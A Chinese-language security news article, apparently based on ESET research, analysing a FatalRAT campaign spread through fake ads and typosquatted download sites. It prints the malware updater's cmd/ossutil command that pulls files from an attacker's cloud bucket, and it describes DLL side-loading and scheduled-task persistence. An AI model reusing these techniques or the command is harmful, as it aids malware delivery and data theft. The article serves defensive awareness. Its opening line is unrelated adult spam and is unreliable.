自拍偷在线精品自拍偷,亚洲欧美中文日韩v在线观看不卡

警惕:針對中文用戶的虛假安裝程序正在盛行

安全 應(yīng)用安全
近日,ESET的安全研究人員發(fā)現(xiàn)了一種針對東南亞和東亞華裔人群的惡意軟件活動。攻擊者通過在Google搜索結(jié)果中購買誤導(dǎo)性廣告,誘騙受害者下載安裝木馬安裝程序。

近日,ESET的安全研究人員發(fā)現(xiàn)了一種針對東南亞和東亞華裔人群的惡意軟件活動。攻擊者通過在Google搜索結(jié)果中購買誤導(dǎo)性廣告,誘騙受害者下載安裝木馬安裝程序。未知的攻擊者創(chuàng)建了虛假網(wǎng)站,看起來類似于火狐瀏覽器、WhatsApp或Telegram等流行應(yīng)用程序的網(wǎng)站,但除了提供合法軟件外,他們還提供了一種遠程訪問木馬FatalRAT,使攻擊者能夠控制受害的計算機設(shè)備。

關(guān)鍵發(fā)現(xiàn)

  • 攻擊者購買廣告,將他們的惡意網(wǎng)站定位在谷歌搜索結(jié)果的“贊助”部分。在ESET向谷歌報告此問題后,谷歌已將這些惡意廣告移除。
  • 這些網(wǎng)站大多數(shù)使用的是中文并且提供軟件的中文版本,這表明攻擊者主要針對的是華語人群。
  • 調(diào)查數(shù)據(jù)顯示,受害者大多在東南亞和東亞,這表明廣告針對的是該地區(qū)。
  • ESET在2022年8月至2023年1月期間觀察到這些攻擊,但根據(jù)其遙測數(shù)據(jù)顯示,至少從2022年5月開始這些虛假安裝程序就已經(jīng)開始運行。
  • 在這次攻擊中使用的惡意軟件或網(wǎng)絡(luò)基礎(chǔ)設(shè)施都沒有與任何已命名組織的已知活動相匹配,因此目前ESET還沒有將此活動歸因于任何已知組織。

受害者研究

根據(jù)ESET提供的攻擊熱圖顯示,2022年8月至2023年1月期間,大多數(shù)攻擊影響了中國大陸及香港和臺灣地區(qū)。其他少數(shù)受害群體依次來自馬來西亞、日本、菲律賓、泰國、新加坡、印度尼西亞和緬甸。


【圖1:2022年8月至2023年1月期間,ESET檢測到的受害者地理分布】

攻擊概況

圖2展示了攻擊的簡單概況。由多個組件組成的鏈條最終會安裝AT&T研究人員于2021年8月發(fā)現(xiàn)的FatalRAT惡意軟件。據(jù)悉,這是一種遠程訪問木馬,允許攻擊者獲取受害者計算機設(shè)備的控制權(quán),包括執(zhí)行任意shell命令、下載運行文件、從網(wǎng)絡(luò)瀏覽器竊取數(shù)據(jù)以及捕獲鍵入信息等。

【圖2:攻擊的簡單概況】

虛假網(wǎng)站

攻擊者注冊了各種域名,這些域名都指向同一個IP地址:一個服務(wù)器托管多個下載木馬軟件的網(wǎng)站。其中一些網(wǎng)站看起來與合法網(wǎng)站一模一樣,但卻提供惡意安裝程序。其他可能由攻擊者翻譯的網(wǎng)站則提供了中國人無法使用的軟件的中文版本,如Telegram,詳見圖3。

【圖3:傳遞 FatalRAT惡意軟件的虛假Telegram網(wǎng)站】

ESET觀察了這些應(yīng)用程序的惡意網(wǎng)站和安裝程序,按受歡迎程度排序大致為:

  • Chrome;
  • Firefox;
  • Telegram;
  • WhatsApp;
  • Line;
  • Signal;
  • Skype;
  • Electrum比特幣錢包;
  • 搜狗拼音輸入法;
  • 有道詞典;
  • WPS Office。

更多其他虛假網(wǎng)站詳見圖4。結(jié)果顯示,除了Electrum比特幣錢包網(wǎng)站外,其他網(wǎng)站都是中文網(wǎng)站,這表明攻擊者主要針對華語群體。

【圖4:攻擊者為提供惡意安裝程序而創(chuàng)建的虛假網(wǎng)站】

從理論上講,潛在的受害者有很多可能的途徑被引導(dǎo)到這些虛假網(wǎng)站,一家新聞網(wǎng)站報道稱,當他們在谷歌中搜索Firefox瀏覽器時,會看到一則廣告,引導(dǎo)他們進入這些惡意網(wǎng)站之一。我們無法重現(xiàn)這樣的搜索結(jié)果,但相信這些廣告只提供給了目標地區(qū)的用戶。

據(jù)悉,在ESET向谷歌報告此問題后,谷歌已將這些惡意廣告移除。

【圖5:Firefox的搜索結(jié)果中,有一個虛假網(wǎng)站的廣告】

鑒于攻擊者為其網(wǎng)站注冊的許多域名與合法域名非常相似,攻擊者也有可能依靠拼寫錯誤來吸引潛在的受害者訪問他們的網(wǎng)站。一些例子包括:

  • telegraem. org(假的)VS. telegram.org(合法的);
  • electrumx. org(假的)VS. electrum.org(合法的);
  • youedao. Com(假的)VS.youdao.com(合法的);

安裝程序

從虛假網(wǎng)站下載的安裝程序并不是托管在與網(wǎng)站相同的服務(wù)器上,而是托管在阿里云對象存儲服務(wù)(Alibaba Cloud Object Storage Service)中。它們是用高級安裝程序創(chuàng)建的數(shù)字簽名MSI文件。圖6顯示了攻擊者在2023年1月6日上載到云存儲的惡意安裝程序。

【圖6:2023年1月6日,攻擊者將惡意安裝程序上傳到云存儲】

當執(zhí)行這些安裝程序時,它們通常:

  • 在%PROGRAMDATA%\Progtmy目錄下,刪除并執(zhí)行惡意加載程序,以及運行FatalRAT惡意軟件所需的文件;
  • 刪除%PROGRAMDATA%\Progtmy\0目錄中的惡意更新程序和相關(guān)文件;
  • 在%USERPROFILE%目錄中放置一個名為ossutilconfig的文件。此文件包含更新程序用于連接到阿里云中的遠程桶的憑據(jù);
  • 創(chuàng)建一個空目錄%PROGRAMDATA%\Progptp,不過我們觀察到一些情況下FatalRAT惡意軟件會被安裝在這個目錄中;
  • 刪除并執(zhí)行C:\Program Files\Common Files中的合法安裝程序;
  • 創(chuàng)建計劃任務(wù)以執(zhí)行加載程序和更新程序組件;

該惡意軟件通過側(cè)載(side-loading)惡意DLL libpng13.dll運行,該DLL被sccs.exe(瀏覽器支持模塊)使用,sccs.exe是迅雷開發(fā)的合法可執(zhí)行文件。原始libpng13.dll也包含在安裝包中(重命名為一個隨機名稱),因為惡意DLL將其導(dǎo)出的函數(shù)轉(zhuǎn)發(fā)到原始DLL。惡意DLL中轉(zhuǎn)發(fā)的一些導(dǎo)出如圖7所示。圖像顯示,在本例中,原始DLL被重命名為BHuedjhd.dll,惡意DLL被編譯為Dll22.dll。

【圖7:在惡意DLL中被轉(zhuǎn)發(fā)到原DLL的部分導(dǎo)出函數(shù)】

惡意軟件更新程序以類似的方式執(zhí)行,通過側(cè)載dr.dll,由騰訊開發(fā)的合法簽名二進制文件使用。惡意DLL非常簡單,并執(zhí)行OSSUTIL(包含在安裝包中的su.exe)從攻擊者控制的阿里云桶中下載文件。DLL執(zhí)行的命令是:

cmd /C “C:\ProgramData\Progtmy\2\ssu.exe cp -r oss://occ-a1/dll/3/ C:\ProgramData\Progtmy\ –update”

這應(yīng)該從遠程存儲桶occ-a1(與用于存儲安裝程序的桶不同,但在同一個帳戶中)更新%PROGRAMDATA%\Progtmy本地目錄中的文件,但是它在我們分析的任何安裝程序中都不起作用,因為%PROGRAMDATA%\Progtmy\2子目錄不存在(它應(yīng)該是由安裝程序創(chuàng)建的子目錄0)。

攻擊者在為更新程序創(chuàng)建的計劃任務(wù)上犯了同樣的錯誤,因為執(zhí)行路徑也引用了不存在的子目錄2。在大多數(shù)情況下,會創(chuàng)建四個計劃任務(wù):兩個用于RAT(一組定期執(zhí)行,另一組在任何用戶登錄到PC時執(zhí)行),兩個用于更新程序。任務(wù)的名稱基于Windows構(gòu)建號和計算機名稱,如圖8所示。

【圖8:由惡意安裝程序創(chuàng)建的計劃任務(wù)】

加載程序

加載程序libpng13.dll是一個非常簡單的組件,它在內(nèi)存中打開并執(zhí)行一個名為Micr.jpg的文件,該文件位于和DLL相同的目錄中。攻擊者通過多次調(diào)用只打印一些硬編碼值的函數(shù)來混淆加載程序。使用此行為可能是為了避免被安全解決方案檢測到,或使DLL的分析復(fù)雜化。

【圖9:左邊顯示了混淆的代碼,右邊顯示了去混淆的代碼】

Micr.jpg實際上是包含嵌入式DLL的shellcode。該shellcode的目的是通過調(diào)用名為SignalChromeElf的DLL的導(dǎo)出函數(shù)來加載并在內(nèi)存中執(zhí)行嵌入式DLL。在執(zhí)行這個導(dǎo)出函數(shù)之前,shellcode重構(gòu)DLL的導(dǎo)入表并調(diào)用DllEntryPoint,它簡單地調(diào)用Windows API函數(shù)DisableThreadLibraryCalls來增加DLL的隱蔽性。

SignalChromeElf本質(zhì)上將解密、加載并執(zhí)行嵌入DLL中的加密有效載荷。這個加密的有效載荷是FatalRAT惡意軟件,在它解密后,DLL將找到一個名為SVP7的導(dǎo)出函數(shù)的地址,其中包含惡意軟件的入口點,并調(diào)用它,將FatalRAT的加密配置作為參數(shù)傳遞。

嵌入式DLL中解密有效負載的函數(shù)與FatalRAT中用于解密其配置的函數(shù)相同。圖10顯示了該函數(shù)的一個示例。

FatalRAT

FatalRAT是一種遠程訪問木馬,由AT&T Alien Labs于2021年8月記錄。這種惡意軟件提供了一組功能,在受害者的計算機上執(zhí)行各種惡意活動。例如,該惡意軟件可以:

  • 捕獲按鍵信息;
  • 改變受害者的屏幕分辨率;
  • 終止瀏覽器進程并竊取或刪除其存儲的數(shù)據(jù),目標瀏覽器是:Chrome、火狐、QQ以及搜狗;
  • 下載并執(zhí)行一個文件;
  • 執(zhí)行shell命令;

該惡意軟件包含各種檢查,以確定它是否在虛擬環(huán)境中運行。根據(jù)其配置,這些檢查可能被執(zhí)行,也可能不被執(zhí)行。

根據(jù)ESET的分析結(jié)果可以確定這次活動中使用的FatalRAT版本與AT&T在其博文中記錄的版本非常相似,所以這里不會贅述更多細節(jié)。圖11顯示了它們之間的比較,圖10顯示了用于解密來自該活動的FatalRAT樣本中的字符串的反編譯代碼,這與AT&T所描述的相同。

【圖10:FatalRAT樣本用于解密其配置字符串的函數(shù)的反編譯代碼】

【圖11:AT&T分析的FatalRAT樣本與該活動中發(fā)現(xiàn)的FatalRAT樣本之間的BinDiff比較】

先前版本

ESET研究人員還發(fā)現(xiàn)了攻擊者至少從2022年5月就開始使用的惡意安裝程序的先前版本。與上述安裝程序不同,這個版本包含一個xor加密的有效負載,分為三個文件:Micr. Flv、Micr2. flv以及Micr3. flv。每個文件都用不同的單字節(jié)XOR密鑰加密。一旦解密,這三個文件的內(nèi)容將被連接起來,形成與C&C服務(wù)器聯(lián)系以下載和執(zhí)行進一步shellcode的shellcode。

在這種情況下,加載程序DLL被命名為dr.dll——與安裝程序的后續(xù)版本中用于更新機制的名稱相同,由相同的合法可執(zhí)行文件側(cè)加載。鑒于這個舊版本似乎沒有更新程序,研究人員認為攻擊者自2022年8月以來已經(jīng)用新版本的安裝程序取代了它。

結(jié)語

攻擊者花費了很大精力,試圖將其網(wǎng)站使用的域名盡可能地與官方名稱相似。在大多數(shù)情況下,虛假網(wǎng)站甚至是合法網(wǎng)站的相同副本。至于木馬安裝程序,它們會安裝用戶感興趣的實際應(yīng)用程序,從而盡可能地避免被懷疑。由于所有這些原因,我們看到在下載軟件之前仔細檢查我們訪問的URL是多么重要。更好的做法是,在檢查它是否是實際的供應(yīng)商站點后,再將它輸入到瀏覽器的地址欄中。

由于這次活動使用的惡意軟件FatalRAT包含了用于操縱來自不同瀏覽器數(shù)據(jù)的各種命令,而且受害者并不是針對特定類型的用戶,因此任何人都可能受到影響。攻擊者可能只對竊取網(wǎng)絡(luò)證書等信息感興趣,并在地下論壇上出售它們,或?qū)⑺鼈冇糜诹硪环N類型的犯罪軟件活動,但目前還不可能將這種活動具體歸因于已知或新的威脅行為者。

責任編輯:華軒 來源: 今日頭條
相關(guān)推薦

2023-07-03 22:30:27

2022-01-19 10:34:46

數(shù)據(jù)泄露網(wǎng)絡(luò)欺詐

2023-06-14 16:29:51

2020-02-07 17:02:25

新冠病毒疫情網(wǎng)絡(luò)安全

2021-02-02 10:41:29

Ubuntu安裝程序開發(fā)人員

2025-04-02 07:45:00

加密貨幣黑客惡意軟件

2014-02-14 13:32:29

2009-10-26 13:05:03

插件

2010-08-19 11:27:24

2021-12-07 18:39:19

黑客虛假廣告惡意軟件

2023-02-20 14:26:16

2022-05-19 14:36:54

SQL Server服務(wù)器暴力攻擊

2023-03-11 22:24:11

2012-05-07 08:18:42

程序日志性能

2013-09-09 11:37:19

卡巴斯基木馬QVOD

2013-12-12 16:36:03

2020-06-17 15:02:26

基礎(chǔ)設(shè)施網(wǎng)絡(luò)攻擊網(wǎng)絡(luò)安全

2022-11-09 06:44:37

2013-01-29 15:47:34

2023-09-04 15:59:09

點贊
收藏

51CTO技術(shù)棧公眾號